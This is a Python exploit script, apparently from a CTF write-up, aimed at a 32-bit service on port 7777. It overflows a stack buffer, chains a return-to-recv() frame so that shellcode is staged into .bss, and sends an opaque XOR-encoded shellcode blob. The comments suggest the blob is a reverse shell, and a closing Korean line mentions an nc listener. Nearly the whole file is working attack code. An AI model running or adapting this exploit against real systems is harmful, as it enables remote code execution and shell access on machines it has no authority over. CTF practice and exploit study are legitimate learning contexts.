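#!/usr/bin/python
"""Return-to-recv() exploit for a CTF service on tcp/7777 (32-bit x86, non-PIE target).

Attack flow, as encoded in ``build_payload``:

1. Send ``"write"`` followed by 0xf0 filler bytes; the filler overruns a
   stack buffer in the server and reaches the saved return address.
2. Overwrite that return address with ``recv@plt`` and lay out a fake
   frame so that ``recv(CLIENT_FD, BSS, len(shellcode), 0)`` runs, with
   ``BSS`` doubling as recv()'s own return address.
3. Send the shellcode as a second message; the staged recv() writes it
   into .bss and then "returns" into it.

Everything here is specific to one binary: the PLT and .bss addresses,
the 0xf0 offset, and the descriptor number 4 (assumed to be the server's
accepted client socket -- verify for your target). The shellcode is an
opaque encoded blob copied from the original write-up; read the note on
``SHELLCODE`` before pointing this at anything.

Usage: ``exploit.py [host [port]]`` (defaults: localhost 7777).
"""
import socket
import struct
import sys
import time

# Fixed addresses in the target binary (0x0804xxxx => 32-bit, non-PIE).
RECV_PLT = 0x08048780  # recv@plt
BSS = 0x0804b0a0       # writable, fixed address: shellcode is staged and executed here

# Number of filler bytes between the "write" prefix (presumably the command
# the service dispatches on) and the saved return address, as in the
# original exploit.
PAD_LEN = 0xf0

# Assumed descriptor of the accepted client socket inside the server
# (commonly 3 = listener, 4 = first accepted client) -- TODO confirm.
CLIENT_FD = 4

# Opaque payload copied verbatim from the original write-up. Its leading
# bytes look like a self-decoding stub (fnstenv-based GetPC followed by an
# XOR loop), so what it actually does -- and any call-back address or port
# baked into it -- cannot be read from this source. Regenerate it for your
# own listener instead of trusting this blob; the write-up pairs it with an
# ``nc`` listener, which suggests a reverse shell.
SHELLCODE = (
    b"\xdb\xd6\xbb\xed\x91\xd8\x8f\xd9\x74\x24\xf4\x5e\x33\xc9"
    b"\xb1\x12\x31\x5e\x1a\x03\x5e\x1a\x83\xee\xfc\xe2\x18\xa0"
    b"\x03\x78\x01\x90\xf0\xd4\xaf\x15\x7e\x3b\x9f\x7c\x4d\x3c"
    b"\x84\xde\x25\x42\x3a\xdf\xb4\xda\x52\xc1\xd7\x44\xf1\x97"
    b"\x07\xd8\xa5\xee\xc9\x99\x2f\x97\x51\xd3\x2f\x0e\xe5\x32"
    b"\x9f\x8e\x24\x44\x96\x89\x4f\x15\x40\x45\x9f\xe5\xf8\xf1"
    b"\xf0\x6b\x91\x6f\x86\x8f\x31\x23\x11\xae\x01\xc8\xec\xb1"
)


def p(value):
    """Pack *value* as a 32-bit little-endian unsigned int (the target is x86)."""
    return struct.pack("<L", value)


def build_payload(shellcode=SHELLCODE, client_fd=CLIENT_FD):
    """Build stage 1: the overflow plus a fake frame for recv(client_fd, BSS, len(shellcode), 0).

    After the overwritten return address the frame is, in stack order:
    recv@plt (new return address), BSS (where recv() returns to, i.e. the
    shellcode), then recv()'s arguments fd, buf, len, flags.

    Returns the message as bytes; the caller appends the newline.
    """
    frame = (
        p(RECV_PLT)
        + p(BSS)
        + p(client_fd)
        + p(BSS)
        + p(len(shellcode))
        + p(0)
    )
    return b"write" + b"A" * PAD_LEN + frame


def exploit(host="localhost", port=7777, shellcode=SHELLCODE, delay=1.0):
    """Deliver the two-stage exploit to host:port and return the server's final reply.

    Stage 1 is the overflow; stage 2, sent ``delay`` seconds later, is the
    shellcode that the staged recv() reads into .bss. The delay gives the
    server time to reach that recv() so the shellcode is not consumed by its
    original read together with stage 1 -- this is timing-based and may need
    tuning. The socket is always closed, even if the connection fails.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, port))
        sock.recv(1024)  # banner / prompt, discarded
        # sendall() rather than send(): a short write would truncate the frame.
        sock.sendall(build_payload(shellcode) + b"\n")
        time.sleep(delay)
        sock.sendall(shellcode)
        return sock.recv(1024)
    finally:
        sock.close()  # Python 2 sockets are not context managers, hence try/finally


def main(argv=None):
    """CLI entry point; ``argv`` defaults to ``sys.argv[1:]``."""
    args = sys.argv[1:] if argv is None else argv
    host = args[0] if len(args) > 0 else "localhost"
    port = int(args[1]) if len(args) > 1 else 7777
    exploit(host, port)


if __name__ == "__main__":
    main()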
한쪽에서는 nc로 연결을 기다리고, 다른 쪽에서 exploit을 실행했습니다.